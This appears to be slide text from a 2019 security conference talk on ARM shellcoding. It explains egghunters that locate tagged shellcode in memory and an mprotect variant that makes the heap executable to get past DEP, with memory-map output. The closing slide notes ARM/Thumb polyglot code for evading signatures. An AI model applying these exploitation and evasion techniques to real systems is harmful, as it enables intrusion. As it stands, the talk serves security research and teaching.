  • 28. NETSQUARE (c) SAUMIL SHAH#HITB2019AMS Egghunter heap stack Lib Lib Binary shellcodeHACKHACK overflow ROP egghunter RWX - by ROP chain Search for HACK+HACK one page at a time. gef> vmmap Start End Perm Path 0x00008000 0x00009000 rw- /home/pi/eggbreak 0x00010000 0x00011000 rw- /home/pi/eggbreak 0x00011000 0x00032000 rw- [heap] 0xb6e9c000 0xb6fbe000 r-x /lib/arm-linux-gnueabihf/libc-2.13.so 0xb6fbe000 0xb6fc5000 --- /lib/arm-linux-gnueabihf/libc-2.13.so 0xb6fc5000 0xb6fc7000 r-- /lib/arm-linux-gnueabihf/libc-2.13.so 0xb6fc7000 0xb6fc8000 rw- /lib/arm-linux-gnueabihf/libc-2.13.so 0xb6fc8000 0xb6fcb000 rw- 0xb6fd8000 0xb6ff5000 r-x /lib/arm-linux-gnueabihf/ld-2.13.so 0xb6ffa000 0xb6ffd000 rw- 0xb6ffd000 0xb6ffe000 r-- /lib/arm-linux-gnueabihf/ld-2.13.so 0xb6ffe000 0xb6fff000 rw- /lib/arm-linux-gnueabihf/ld-2.13.so 0xb6fff000 0xb7000000 r-x [sigpage] 0xbefdf000 0xbeffe000 rw- 0xbeffe000 0xbf000000 rwx [stack] memory page not executable shellcode shellcode
  • 29. NETSQUARE (c) SAUMIL SHAH#HITB2019AMS Egghunter - DEP • If EGG+shellcode is in a different memory region, then it may not be executable – Overflow in the stack – Shellcode in the heap • Enter the mprotect egghunter!
  • 30. NETSQUARE (c) SAUMIL SHAH#HITB2019AMS mprotect Egghunter heap stack Lib Lib Binary shellcodeHACKHACK overflow ROP mprotect egghunter RWX RWX RWX RWX RWX RWX RWX gef> vmmap Start End Perm Path 0x00008000 0x00009000 rwx /home/pi/eggbreak 0x00010000 0x00011000 rwx /home/pi/eggbreak 0x00011000 0x00012000 rwx [heap] 0x00012000 0x00032000 rw- [heap] 0xb6e9c000 0xb6fbe000 r-x /lib/arm-linux-gnueabihf/libc-2.13.so 0xb6fbe000 0xb6fc5000 --- /lib/arm-linux-gnueabihf/libc-2.13.so 0xb6fc5000 0xb6fc7000 r-- /lib/arm-linux-gnueabihf/libc-2.13.so 0xb6fc7000 0xb6fc8000 rw- /lib/arm-linux-gnueabihf/libc-2.13.so 0xb6fc8000 0xb6fcb000 rw- 0xb6fd8000 0xb6ff5000 r-x /lib/arm-linux-gnueabihf/ld-2.13.so 0xb6ffa000 0xb6ffd000 rw- 0xb6ffd000 0xb6ffe000 r-- /lib/arm-linux-gnueabihf/ld-2.13.so 0xb6ffe000 0xb6fff000 rw- /lib/arm-linux-gnueabihf/ld-2.13.so 0xb6fff000 0xb7000000 r-x [sigpage] 0xbefdf000 0xbeffe000 rw- 0xbeffe000 0xbf000000 rwx [stack] shellcode shellcode
  • 31. NETSQUARE (c) SAUMIL SHAH#HITB2019AMS mprotect Egghunter DEMO
  • 32. NETSQUARE (c) SAUMIL SHAH#HITB2019AMS Conclusion • ARM/Thumb Polyglot instructions offer many opportunities for OBFUSCATION and SIGNATURE bypass. • Lots of exploration opportunities in ARM shellcoding. https://github.com/therealsaumil/arm_shellcode
  • 33. NETSQUARE (c) SAUMIL SHAH#HITB2019AMS exit(0) Saumil Shah @therealsaumil #HITB2019AMS 9 May, Amsterdam